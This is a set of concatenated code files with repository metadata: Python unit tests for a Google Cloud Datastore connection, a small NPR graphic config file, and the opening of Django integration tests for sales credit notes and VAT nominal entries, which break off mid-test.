eventual=True, transaction_id=TRANSACTION)
def test_lookup_single_key_empty_response_w_transaction(self):
from google.cloud.datastore._generated import datastore_pb2
PROJECT = 'PROJECT'
TRANSACTION = b'TRANSACTION'
key_pb = self._make_key_pb(PROJECT)
rsp_pb = datastore_pb2.LookupResponse()
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':lookup',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
found, missing, deferred = conn.lookup(PROJECT, [key_pb],
transaction_id=TRANSACTION)
self.assertEqual(len(found), 0)
self.assertEqual(len(missing), 0)
self.assertEqual(len(deferred), 0)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.LookupRequest
request = rq_class()
request.ParseFromString(cw['body'])
keys = list(request.keys)
self.assertEqual(len(keys), 1)
self.assertEqual(key_pb, keys[0])
self.assertEqual(request.read_options.transaction, TRANSACTION)
def test_lookup_single_key_nonempty_response(self):
from google.cloud.datastore._generated import datastore_pb2
from google.cloud.datastore._generated import entity_pb2
PROJECT = 'PROJECT'
key_pb = self._make_key_pb(PROJECT)
rsp_pb = datastore_pb2.LookupResponse()
entity = entity_pb2.Entity()
entity.key.CopyFrom(key_pb)
rsp_pb.found.add(entity=entity)
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':lookup',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
(found,), missing, deferred = conn.lookup(PROJECT, [key_pb])
self.assertEqual(len(missing), 0)
self.assertEqual(len(deferred), 0)
self.assertEqual(found.key.path[0].kind, 'Kind')
self.assertEqual(found.key.path[0].id, 1234)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.LookupRequest
request = rq_class()
request.ParseFromString(cw['body'])
keys = list(request.keys)
self.assertEqual(len(keys), 1)
self.assertEqual(key_pb, keys[0])
def test_lookup_multiple_keys_empty_response(self):
from google.cloud.datastore._generated import datastore_pb2
PROJECT = 'PROJECT'
key_pb1 = self._make_key_pb(PROJECT)
key_pb2 = self._make_key_pb(PROJECT, id_=2345)
rsp_pb = datastore_pb2.LookupResponse()
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':lookup',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
found, missing, deferred = conn.lookup(PROJECT, [key_pb1, key_pb2])
self.assertEqual(len(found), 0)
self.assertEqual(len(missing), 0)
self.assertEqual(len(deferred), 0)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.LookupRequest
request = rq_class()
request.ParseFromString(cw['body'])
keys = list(request.keys)
self.assertEqual(len(keys), 2)
self.assertEqual(key_pb1, keys[0])
self.assertEqual(key_pb2, keys[1])
def test_lookup_multiple_keys_w_missing(self):
from google.cloud.datastore._generated import datastore_pb2
PROJECT = 'PROJECT'
key_pb1 = self._make_key_pb(PROJECT)
key_pb2 = self._make_key_pb(PROJECT, id_=2345)
rsp_pb = datastore_pb2.LookupResponse()
er_1 = rsp_pb.missing.add()
er_1.entity.key.CopyFrom(key_pb1)
er_2 = rsp_pb.missing.add()
er_2.entity.key.CopyFrom(key_pb2)
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':lookup',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
result, missing, deferred = conn.lookup(PROJECT, [key_pb1, key_pb2])
self.assertEqual(result, [])
self.assertEqual(len(deferred), 0)
self.assertEqual([missed.key for missed in missing],
[key_pb1, key_pb2])
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.LookupRequest
request = rq_class()
request.ParseFromString(cw['body'])
keys = list(request.keys)
self.assertEqual(len(keys), 2)
self.assertEqual(key_pb1, keys[0])
self.assertEqual(key_pb2, keys[1])
def test_lookup_multiple_keys_w_deferred(self):
from google.cloud.datastore._generated import datastore_pb2
PROJECT = 'PROJECT'
key_pb1 = self._make_key_pb(PROJECT)
key_pb2 = self._make_key_pb(PROJECT, id_=2345)
rsp_pb = datastore_pb2.LookupResponse()
rsp_pb.deferred.add().CopyFrom(key_pb1)
rsp_pb.deferred.add().CopyFrom(key_pb2)
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':lookup',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
result, missing, deferred = conn.lookup(PROJECT, [key_pb1, key_pb2])
self.assertEqual(result, [])
self.assertEqual(len(missing), 0)
self.assertEqual([def_key for def_key in deferred], [key_pb1, key_pb2])
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
self.assertEqual(cw['uri'], URI)
self.assertEqual(cw['method'], 'POST')
self.assertEqual(cw['headers']['Content-Type'],
'application/x-protobuf')
self.assertEqual(cw['headers']['User-Agent'], conn.USER_AGENT)
rq_class = datastore_pb2.LookupRequest
request = rq_class()
request.ParseFromString(cw['body'])
keys = list(request.keys)
self.assertEqual(len(keys), 2)
self.assertEqual(key_pb1, keys[0])
self.assertEqual(key_pb2, keys[1])
def test_run_query_w_eventual_no_transaction(self):
from google.cloud.datastore._generated import datastore_pb2
from google.cloud.datastore._generated import query_pb2
PROJECT = 'PROJECT'
KIND = 'Nonesuch'
CURSOR = b'\x00'
q_pb = self._make_query_pb(KIND)
rsp_pb = datastore_pb2.RunQueryResponse()
rsp_pb.batch.end_cursor = CURSOR
no_more = query_pb2.QueryResultBatch.NO_MORE_RESULTS
rsp_pb.batch.more_results = no_more
rsp_pb.batch.entity_result_type = query_pb2.EntityResult.FULL
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':runQuery',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
pbs, end, more, skipped = conn.run_query(PROJECT, q_pb,
eventual=True)
self.assertEqual(pbs, [])
self.assertEqual(end, CURSOR)
self.assertTrue(more)
self.assertEqual(skipped, 0)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.RunQueryRequest
request = rq_class()
request.ParseFromString(cw['body'])
self.assertEqual(request.partition_id.namespace_id, '')
self.assertEqual(request.query, q_pb)
self.assertEqual(request.read_options.read_consistency,
datastore_pb2.ReadOptions.EVENTUAL)
self.assertEqual(request.read_options.transaction, b'')
def test_run_query_wo_eventual_w_transaction(self):
from google.cloud.datastore._generated import datastore_pb2
from google.cloud.datastore._generated import query_pb2
PROJECT = 'PROJECT'
KIND = 'Nonesuch'
CURSOR = b'\x00'
TRANSACTION = b'TRANSACTION'
q_pb = self._make_query_pb(KIND)
rsp_pb = datastore_pb2.RunQueryResponse()
rsp_pb.batch.end_cursor = CURSOR
no_more = query_pb2.QueryResultBatch.NO_MORE_RESULTS
rsp_pb.batch.more_results = no_more
rsp_pb.batch.entity_result_type = query_pb2.EntityResult.FULL
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':runQuery',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
pbs, end, more, skipped = conn.run_query(
PROJECT, q_pb, transaction_id=TRANSACTION)
self.assertEqual(pbs, [])
self.assertEqual(end, CURSOR)
self.assertTrue(more)
self.assertEqual(skipped, 0)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.RunQueryRequest
request = rq_class()
request.ParseFromString(cw['body'])
self.assertEqual(request.partition_id.namespace_id, '')
self.assertEqual(request.query, q_pb)
self.assertEqual(
request.read_options.read_consistency,
datastore_pb2.ReadOptions.READ_CONSISTENCY_UNSPECIFIED)
self.assertEqual(request.read_options.transaction, TRANSACTION)
def test_run_query_w_eventual_and_transaction(self):
from google.cloud.datastore._generated import datastore_pb2
from google.cloud.datastore._generated import query_pb2
PROJECT = 'PROJECT'
KIND = 'Nonesuch'
CURSOR = b'\x00'
TRANSACTION = b'TRANSACTION'
q_pb = self._make_query_pb(KIND)
rsp_pb = datastore_pb2.RunQueryResponse()
rsp_pb.batch.end_cursor = CURSOR
no_more = query_pb2.QueryResultBatch.NO_MORE_RESULTS
rsp_pb.batch.more_results = no_more
rsp_pb.batch.entity_result_type = query_pb2.EntityResult.FULL
conn = self._makeOne()
self.assertRaises(ValueError, conn.run_query, PROJECT, q_pb,
eventual=True, transaction_id=TRANSACTION)
def test_run_query_wo_namespace_empty_result(self):
from google.cloud.datastore._generated import datastore_pb2
from google.cloud.datastore._generated import query_pb2
PROJECT = 'PROJECT'
KIND = 'Nonesuch'
CURSOR = b'\x00'
q_pb = self._make_query_pb(KIND)
rsp_pb = datastore_pb2.RunQueryResponse()
rsp_pb.batch.end_cursor = CURSOR
no_more = query_pb2.QueryResultBatch.NO_MORE_RESULTS
rsp_pb.batch.more_results = no_more
rsp_pb.batch.entity_result_type = query_pb2.EntityResult.FULL
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':runQuery',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
pbs, end, more, skipped = conn.run_query(PROJECT, q_pb)
self.assertEqual(pbs, [])
self.assertEqual(end, CURSOR)
self.assertTrue(more)
self.assertEqual(skipped, 0)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.RunQueryRequest
request = rq_class()
request.ParseFromString(cw['body'])
self.assertEqual(request.partition_id.namespace_id, '')
self.assertEqual(request.query, q_pb)
def test_run_query_w_namespace_nonempty_result(self):
from google.cloud.datastore._generated import datastore_pb2
from google.cloud.datastore._generated import entity_pb2
PROJECT = 'PROJECT'
KIND = 'Kind'
entity = entity_pb2.Entity()
q_pb = self._make_query_pb(KIND)
rsp_pb = datastore_pb2.RunQueryResponse()
rsp_pb.batch.entity_results.add(entity=entity)
rsp_pb.batch.entity_result_type = 1 # FULL
rsp_pb.batch.more_results = 3 # NO_MORE_RESULTS
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':runQuery',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
pbs = conn.run_query(PROJECT, q_pb, 'NS')[0]
self.assertEqual(len(pbs), 1)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.RunQueryRequest
request = rq_class()
request.ParseFromString(cw['body'])
self.assertEqual(request.partition_id.namespace_id, 'NS')
self.assertEqual(request.query, q_pb)
def test_begin_transaction(self):
from google.cloud.datastore._generated import datastore_pb2
PROJECT = 'PROJECT'
TRANSACTION = b'TRANSACTION'
rsp_pb = datastore_pb2.BeginTransactionResponse()
rsp_pb.transaction = TRANSACTION
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':beginTransaction',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
self.assertEqual(conn.begin_transaction(PROJECT), TRANSACTION)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.BeginTransactionRequest
request = rq_class()
request.ParseFromString(cw['body'])
def test_commit_wo_transaction(self):
from unit_tests._testing import _Monkey
from google.cloud.datastore._generated import datastore_pb2
from google.cloud.datastore import connection as MUT
from google.cloud.datastore.helpers import _new_value_pb
PROJECT = 'PROJECT'
key_pb = self._make_key_pb(PROJECT)
rsp_pb = datastore_pb2.CommitResponse()
req_pb = datastore_pb2.CommitRequest()
mutation = req_pb.mutations.add()
insert = mutation.upsert
insert.key.CopyFrom(key_pb)
value_pb = _new_value_pb(insert, 'foo')
value_pb.string_value = u'Foo'
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':commit',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
# Set up mock for parsing the response.
expected_result = object()
_parsed = []
def mock_parse(response):
_parsed.append(response)
return expected_result
with _Monkey(MUT, _parse_commit_response=mock_parse):
result = conn.commit(PROJECT, req_pb, None)
self.assertTrue(result is expected_result)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.CommitRequest
request = rq_class()
request.ParseFromString(cw['body'])
self.assertEqual(request.transaction, b'')
self.assertEqual(list(request.mutations), [mutation])
self.assertEqual(request.mode, rq_class.NON_TRANSACTIONAL)
self.assertEqual(_parsed, [rsp_pb])
def test_commit_w_transaction(self):
from unit_tests._testing import _Monkey
from google.cloud.datastore._generated import datastore_pb2
from google.cloud.datastore import connection as MUT
from google.cloud.datastore.helpers import _new_value_pb
PROJECT = 'PROJECT'
key_pb = self._make_key_pb(PROJECT)
rsp_pb = datastore_pb2.CommitResponse()
req_pb = datastore_pb2.CommitRequest()
mutation = req_pb.mutations.add()
insert = mutation.upsert
insert.key.CopyFrom(key_pb)
value_pb = _new_value_pb(insert, 'foo')
value_pb.string_value = u'Foo'
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':commit',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
# Set up mock for parsing the response.
expected_result = object()
_parsed = []
def mock_parse(response):
_parsed.append(response)
return expected_result
with _Monkey(MUT, _parse_commit_response=mock_parse):
result = conn.commit(PROJECT, req_pb, b'xact')
self.assertTrue(result is expected_result)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.CommitRequest
request = rq_class()
request.ParseFromString(cw['body'])
self.assertEqual(request.transaction, b'xact')
self.assertEqual(list(request.mutations), [mutation])
self.assertEqual(request.mode, rq_class.TRANSACTIONAL)
self.assertEqual(_parsed, [rsp_pb])
def test_rollback_ok(self):
from google.cloud.datastore._generated import datastore_pb2
PROJECT = 'PROJECT'
TRANSACTION = b'xact'
rsp_pb = datastore_pb2.RollbackResponse()
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':rollback',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
self.assertEqual(conn.rollback(PROJECT, TRANSACTION), None)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.RollbackRequest
request = rq_class()
request.ParseFromString(cw['body'])
self.assertEqual(request.transaction, TRANSACTION)
def test_allocate_ids_empty(self):
from google.cloud.datastore._generated import datastore_pb2
PROJECT = 'PROJECT'
rsp_pb = datastore_pb2.AllocateIdsResponse()
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':allocateIds',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
self.assertEqual(conn.allocate_ids(PROJECT, []), [])
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.AllocateIdsRequest
request = rq_class()
request.ParseFromString(cw['body'])
self.assertEqual(list(request.keys), [])
def test_allocate_ids_non_empty(self):
from google.cloud.datastore._generated import datastore_pb2
PROJECT = 'PROJECT'
before_key_pbs = [
self._make_key_pb(PROJECT, id_=None),
self._make_key_pb(PROJECT, id_=None),
]
after_key_pbs = [
self._make_key_pb(PROJECT),
self._make_key_pb(PROJECT, id_=2345),
]
rsp_pb = datastore_pb2.AllocateIdsResponse()
rsp_pb.keys.add().CopyFrom(after_key_pbs[0])
rsp_pb.keys.add().CopyFrom(after_key_pbs[1])
conn = self._makeOne()
URI = '/'.join([
conn.api_base_url,
conn.API_VERSION,
'projects',
PROJECT + ':allocateIds',
])
http = conn._http = Http({'status': '200'}, rsp_pb.SerializeToString())
self.assertEqual(conn.allocate_ids(PROJECT, before_key_pbs),
after_key_pbs)
cw = http._called_with
self._verifyProtobufCall(cw, URI, conn)
rq_class = datastore_pb2.AllocateIdsRequest
request = rq_class()
request.ParseFromString(cw['body'])
self.assertEqual(len(request.keys), len(before_key_pbs))
for key_before, key_after in zip(before_key_pbs, request.keys):
self.assertEqual(key_before, key_after)
class Test__parse_commit_response(unittest.TestCase):
def _callFUT(self, commit_response_pb):
from google.cloud.datastore.connection import _parse_commit_response
return _parse_commit_response(commit_response_pb)
def test_it(self):
from google.cloud.datastore._generated import datastore_pb2
from google.cloud.datastore._generated import entity_pb2
index_updates = 1337
keys = [
entity_pb2.Key(
path=[
entity_pb2.Key.PathElement(
kind='Foo',
id=1234,
),
],
),
entity_pb2.Key(
path=[
entity_pb2.Key.PathElement(
kind='Bar',
name='baz',
),
],
),
]
response = datastore_pb2.CommitResponse(
mutation_results=[
datastore_pb2.MutationResult(key=key) for key in keys
],
index_updates=index_updates,
)
result = self._callFUT(response)
self.assertEqual(result, (index_updates, keys))
class Http(object):
_called_with = None
def __init__(self, headers, content):
from httplib2 import Response
self._response = Response(headers)
self._content = content
def request(self, **kw):
self._called_with = kw
return self._response, self._content
class _Connection(object):
host = None
USER_AGENT = 'you-sir-age-int'
def __init__(self, api_url):
self.api_url = api_url
self.build_kwargs = []
def build_api_url(self, **kwargs):
self.build_kwargs.append(kwargs)
return self.api_url
class _GRPCStub(object):
def __init__(self, return_val=None, side_effect=Exception):
self.return_val = return_val
self.side_effect = side_effect
self.method_calls = []
def _method(self, request_pb, name):
self.method_calls.append((request_pb, name))
return self.return_val
def Lookup(self, request_pb):
return self._method(request_pb, 'Lookup')
def RunQuery(self, request_pb):
return self._method(request_pb, 'RunQuery')
def BeginTransaction(self, request_pb):
return self._method(request_pb, 'BeginTransaction')
def Commit(self, request_pb):
result = self._method(request_pb, 'Commit')
if self.side_effect is Exception:
return result
else:
raise self.side_effect
def Rollback(self, request_pb):
return self._method(request_pb, 'Rollback')
def AllocateIds(self, request_pb):
return self._method(request_pb, 'AllocateIds')
class _RequestPB(object):
project_id = None
| [
"varnachandar16@gmail.com"
] | varnachandar16@gmail.com |
6a192ce3a780e557a221c647cf70d5ce37cf901d | 78f3fe4a148c86ce9b80411a3433a49ccfdc02dd | /2017/06/trump-approval-20170601/graphic_config.py | ff3ca865581af3ab3dd6555df9e94d562b335301 | [] | no_license | nprapps/graphics-archive | 54cfc4d4d670aca4d71839d70f23a8bf645c692f | fe92cd061730496cb95c9df8fa624505c3b291f8 | refs/heads/master | 2023-03-04T11:35:36.413216 | 2023-02-26T23:26:48 | 2023-02-26T23:26:48 | 22,472,848 | 16 | 7 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | #!/usr/bin/env python
import base_filters
COPY_GOOGLE_DOC_KEY = '1g0Lnpdt7bS8_NDHxYVFOQ54vuxPCkKqdIPdlWZG3O6Q'
USE_ASSETS = False
# Use these variables to override the default cache timeouts for this graphic
# DEFAULT_MAX_AGE = 20
# ASSETS_MAX_AGE = 300
JINJA_FILTER_FUNCTIONS = base_filters.FILTERS
| [
"ahurt@npr.org"
] | ahurt@npr.org |
a0022e5aad78fa4298fd81dba90deb62577f9337 | 3109aaf72df47f11742aca1c5921f71e03eb9917 | /sales/testing/test_integration/test_credit_note.py | 91d91efad38cf58cf894e057d434c41542c24b3f | [
"MIT"
] | permissive | kofi-teddy/accounts | a225f5639ef8993934fe69ec638d2af19d854c2d | 74633ce4038806222048d85ef9dfe97a957a6a71 | refs/heads/master | 2023-02-19T15:10:20.621628 | 2021-01-23T10:30:27 | 2021-01-23T10:30:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 256,343 | py | from datetime import date, datetime, timedelta
from json import loads
from accountancy.helpers import sort_multiple
from accountancy.testing.helpers import *
from cashbook.models import CashBook, CashBookTransaction
from controls.models import FinancialYear, ModuleSettings, Period
from django.contrib.auth import get_user_model
from django.shortcuts import reverse
from django.test import RequestFactory, TestCase
from django.utils import timezone
from nominals.models import Nominal, NominalTransaction
from sales.helpers import (create_credit_note_with_lines,
create_credit_note_with_nom_entries,
create_invoice_with_lines,
create_invoice_with_nom_entries, create_invoices,
create_lines, create_receipt_with_nom_entries,
create_receipts, create_refund_with_nom_entries,
create_vat_transactions)
from sales.models import Customer, SaleHeader, SaleLine, SaleMatching
from vat.models import Vat, VatTransaction
HEADER_FORM_PREFIX = "header"
LINE_FORM_PREFIX = "line"
match_form_prefix = "match"
SL_MODULE = "SL"
DATE_INPUT_FORMAT = '%d-%m-%Y'
MODEL_DATE_INPUT_FORMAT = '%Y-%m-%d'
def match(match_by, matched_to):
headers_to_update = []
matches = []
match_total = 0
for match_to, match_value in matched_to:
match_total += match_value
match_to.due = match_to.due - match_value
match_to.paid = match_to.total - match_to.due
matches.append(
SaleMatching(
matched_by=match_by,
matched_to=match_to,
value=match_value,
period=match_by.period
)
)
headers_to_update.append(match_to)
match_by.due = match_by.total + match_total
match_by.paid = match_by.total - match_by.due
SaleHeader.objects.bulk_update(
headers_to_update + [match_by], ['due', 'paid'])
SaleMatching.objects.bulk_create(matches)
return match_by, headers_to_update
def create_cancelling_headers(n, customer, ref_prefix, type, value, period):
"""
Create n headers which cancel out with total = value
Where n is an even number
"""
date = timezone.now()
due_date = date + timedelta(days=31)
headers = []
n = int(n / 2)
for i in range(n):
i = SaleHeader(
customer=customer,
ref=ref_prefix + str(i),
goods=value,
discount=0,
vat=0,
total=value,
paid=0,
due=value,
date=date,
due_date=due_date,
type=type,
period=period
)
headers.append(i)
for i in range(n):
i = SaleHeader(
customer=customer,
ref=ref_prefix + str(i),
goods=value * -1,
discount=0,
vat=0,
total=value * -1,
paid=0,
due=value * -1,
date=date,
due_date=due_date,
type=type,
period=period
)
headers.append(i)
return SaleHeader.objects.bulk_create(headers)
class CreateCreditNoteNominalEntries(TestCase):
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_superuser(username="dummy", password="dummy")
cls.factory = RequestFactory()
cls.customer = Customer.objects.create(name="test_customer")
cls.ref = "test matching"
cls.date = datetime.now().strftime(DATE_INPUT_FORMAT)
cls.due_date = (datetime.now() + timedelta(days=31)).strftime(DATE_INPUT_FORMAT)
cls.model_date = datetime.now().strftime(MODEL_DATE_INPUT_FORMAT)
cls.model_due_date = (datetime.now() + timedelta(days=31)).strftime(MODEL_DATE_INPUT_FORMAT)
fy = FinancialYear.objects.create(financial_year=2020)
cls.period = Period.objects.create(fy=fy, period="01", fy_and_period="202001", month_start=date(2020,1,31))
cls.description = "a line description"
# ASSETS
assets = Nominal.objects.create(name="Assets")
current_assets = Nominal.objects.create(
parent=assets, name="Current Assets")
cls.nominal = Nominal.objects.create(
parent=current_assets, name="Bank Account")
cls.sale_control = Nominal.objects.create(
parent=current_assets, name="Sales Ledger Control"
)
# LIABILITIES
liabilities = Nominal.objects.create(name="Liabilities")
current_liabilities = Nominal.objects.create(
parent=liabilities, name="Current Liabilities")
cls.vat_nominal = Nominal.objects.create(
parent=current_liabilities, name="Vat")
cls.vat_code = Vat.objects.create(
code="1", name="standard rate", rate=20)
cls.url = reverse("sales:create")
ModuleSettings.objects.create(
cash_book_period=cls.period,
nominals_period=cls.period,
purchases_period=cls.period,
sales_period=cls.period
)
# CORRECT USAGE
# Each line has a goods value above zero and the vat is 20% of the goods
def test_nominals_created_for_lines_with_goods_and_vat_above_zero(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
matching_data = create_formset_data(match_form_prefix, [])
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 20
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
header = headers[0]
self.assertEqual(
header.total,
-20 * (100 + 20)
)
self.assertEqual(
header.goods,
-20 * 100
)
self.assertEqual(
header.vat,
-20 * 20
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
nom_trans = NominalTransaction.objects.all().order_by("pk")
self.assertEqual(
len(nom_trans),
20 + 20 + 20
# i.e. 20 nominal entries for each goods value
# 20 nominal entries for each vat value
# 20 nominal entries for each goods + vat value
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
-20
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(3 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
nom_trans[(3 * i) + 1]
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(3 * i) + 2]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
goods_trans = nom_trans[::3]
vat_trans = nom_trans[1::3]
total_trans = nom_trans[2::3]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.nominal
)
self.assertEqual(
tran.value,
100
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'g'
)
for i, tran in enumerate(vat_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.vat_nominal
)
self.assertEqual(
tran.value,
20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
'v'
)
for i, tran in enumerate(total_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
self.assertEqual(
tran.header,
header.pk
)
self.assertEqual(
tran.line,
lines[i].pk
)
self.assertEqual(
tran.nominal,
self.sale_control
)
self.assertEqual(
tran.value,
-100 + -20
)
self.assertEqual(
tran.ref,
header.ref
)
self.assertEqual(
tran.period,
self.period
)
self.assertEqual(
tran.date,
header.date
)
self.assertEqual(
tran.field,
't'
)
total = 0
for tran in nom_trans:
total = total + tran.value
self.assertEqual(
total,
0
)
for i, vat_tran in enumerate(vat_transactions):
self.assertEqual(
vat_tran.header,
header.pk
)
self.assertEqual(
vat_tran.line,
lines[i].pk
)
self.assertEqual(
vat_tran.module,
"SL"
)
self.assertEqual(
vat_tran.ref,
header.ref
)
self.assertEqual(
vat_tran.period,
header.period
)
self.assertEqual(
vat_tran.date,
header.date
)
self.assertEqual(
vat_tran.field,
"v"
)
self.assertEqual(
vat_tran.tran_type,
header.type
)
self.assertEqual(
vat_tran.vat_type,
"o"
)
self.assertEqual(
vat_tran.vat_code,
lines[i].vat_code
)
self.assertEqual(
vat_tran.vat_rate,
lines[i].vat_code.rate
)
self.assertEqual(
vat_tran.goods,
lines[i].goods
)
self.assertEqual(
vat_tran.vat,
lines[i].vat
)
self.assertEqual(
header.goods,
sum(vat_tran.goods for vat_tran in vat_transactions)
)
self.assertEqual(
header.vat,
sum(vat_tran.vat for vat_tran in vat_transactions)
)
# CORRECT USAGE
# Each line has a goods value above zero
# And the vat is a zero value
# We are only testing here that no nominal transactions for zero are created
# We are not concerned about the vat return at all
def test_nominals_created_for_lines_with_goods_above_zero_and_vat_equal_to_zero(self):
self.client.force_login(self.user)
data = {}
header_data = create_header(
HEADER_FORM_PREFIX,
{
"type": "sc",
"customer": self.customer.pk,
"period": self.period.pk,
"ref": self.ref,
"date": self.date,
"due_date": self.due_date,
"total": 0
}
)
data.update(header_data)
matching_data = create_formset_data(match_form_prefix, [])
line_forms = ([{
'description': self.description,
'goods': 100,
'nominal': self.nominal.pk,
'vat_code': self.vat_code.pk,
'vat': 0
}]) * 20
line_data = create_formset_data(LINE_FORM_PREFIX, line_forms)
data.update(matching_data)
data.update(line_data)
response = self.client.post(self.url, data)
self.assertEqual(response.status_code, 302)
headers = SaleHeader.objects.all()
self.assertEqual(len(headers), 1)
header = headers[0]
self.assertEqual(
header.total,
-20 * (100 + 0)
)
self.assertEqual(
header.goods,
-20 * 100
)
self.assertEqual(
header.vat,
-20 * 0
)
self.assertEqual(
header.ref,
self.ref
)
self.assertEqual(
header.paid,
0
)
self.assertEqual(
header.due,
header.total
)
nom_trans = NominalTransaction.objects.all()
self.assertEqual(
len(nom_trans),
20 + 20
)
lines = SaleLine.objects.all().order_by("pk")
self.assertEqual(
len(lines),
20
)
vat_transactions = VatTransaction.objects.all().order_by("line")
self.assertEqual(
len(vat_transactions),
20
)
for i, line in enumerate(lines):
self.assertEqual(
line.line_no,
i + 1
)
self.assertEqual(
line.description,
self.description
)
self.assertEqual(
line.goods,
-100
)
self.assertEqual(
line.nominal,
self.nominal
)
self.assertEqual(
line.vat_code,
self.vat_code
)
self.assertEqual(
line.vat,
0
)
self.assertEqual(
line.goods_nominal_transaction,
nom_trans[(2 * i) + 0]
)
self.assertEqual(
line.vat_nominal_transaction,
None
)
self.assertEqual(
line.total_nominal_transaction,
nom_trans[(2 * i) + 1]
)
self.assertEqual(
line.vat_transaction,
vat_transactions[i]
)
# assuming the lines are created in the same order
# as the nominal entries....
goods_trans = nom_trans[::2]
total_trans = nom_trans[1::2]
for i, tran in enumerate(goods_trans):
self.assertEqual(
tran.module,
SL_MODULE
)
